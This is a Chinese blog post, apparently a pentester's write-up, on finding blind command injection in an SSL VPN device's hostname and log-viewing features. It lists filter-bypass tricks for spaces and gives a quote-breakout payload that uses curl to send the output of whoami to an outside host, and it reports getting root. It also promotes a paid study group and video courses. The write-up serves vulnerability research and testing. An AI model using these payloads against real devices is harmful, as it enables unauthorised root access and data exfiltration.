无处不在的RCE
2024-1-12 23:21:54 Author: mp.weixin.qq.com(查看原文) 阅读量:21 收藏

免责声明

本公众号仅用于技术交流与学习,利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号只是知识的搬运工,取之于民用之于民。
如果大家不想错过文章推送的话,可以将公众号设为星标☆

还在为漏扫什么都扫不到,找不到高质量漏洞只能凑低危、风险提示交差而烦恼吗?本期给大家分享一些漏洞挖掘工作中命令注入漏洞的挖掘思路和技巧,学会之后再也不愁找不到漏洞,废话不多说,上菜。

001 XSS -> RCE

测试目标是一个SSL VPN设备,功能点是修改主机名称,主机名称会显示到首页。经验丰富的朋友很容易就能想到XSS测试,然后漏扫一梭子是吧?没错,存在存储型XSS:


在漏扫没扫到漏洞的情况下,你是否会觉得此处安全了?要是搁以前,我也这么认为的,要不是灵光一现想到这是设备类的,不是单纯的web,我也不会发现命令注入,也就没有这篇文章了。

此处请求提交的数据经过两次url解码后是:{"hostname":"aa"}。Fuzz时发现响应状态有2类,True和False,False会显示部分错误原因:

  • 修改成功时返回True:

  • 长度超出范围时返回:

  • 包含空格时返回:

很典型的无回显,利用web界面日志管理功能只能看到操作Web界面时CLI执行的命令,无法看到执行的结果:
通常利用DNSLog外带去测试,但是也没发现任何请求记录,可能你以为没有漏洞想要放弃了,的确使用常规Payload测试没有发现漏洞,那就变换一下Payload,绕过空格过滤可以使用:
< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS
我当时也不知道怎么想到用单引号的,总之就是那么灵光一现试了试:
';curl$IFS$9http://xxx/`whoami`;''`curl$IFS$9http://xxx/$(whoami)`'...
root到手,然后用这个Payload继续测试邮件名称、策略名称、规则名称等相似功能发现近30个命令注入

002 日志查看 -> RCE

怎么也想不到日志日查看居然也有命令注入,本来是查看日志:

请求数据包:

然后加上命令注入的Payload,root到手:

不知道客官品尝的怎么样。漏洞不难,只是很多人可能想不到而已,容易受到惯性思维的影响,觉得遇到搜索框就是SQL注入、XSS就忽略其它可能的漏洞了,漏扫工具扫不到就觉得安全了,如果多发散思维多想想多做做,你会发现RCE无处不在。

如果你是一个长期主义者,欢迎加入我的知识星球,我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款

福利视频

笔者自己录制的一套php视频教程(适合0基础的),感兴趣的童鞋可以看看,基础视频总共约200多集,目前已经录制完毕,后续还有更多视频出品

https://space.bilibili.com/177546377/channel/seriesdetail?sid=2949374

技术交流

技术交流请加笔者微信:richardo1o1 (暗号:growing)


文章来源: https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247493290&idx=1&sn=e0a13858762fb1def5ca3f514cd116f0&chksm=e8a5ecc9dfd265dfce7e1cd18dfc33831f21f318c0cd4d655691f7de99f0e2b4a93d6d5777a4&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh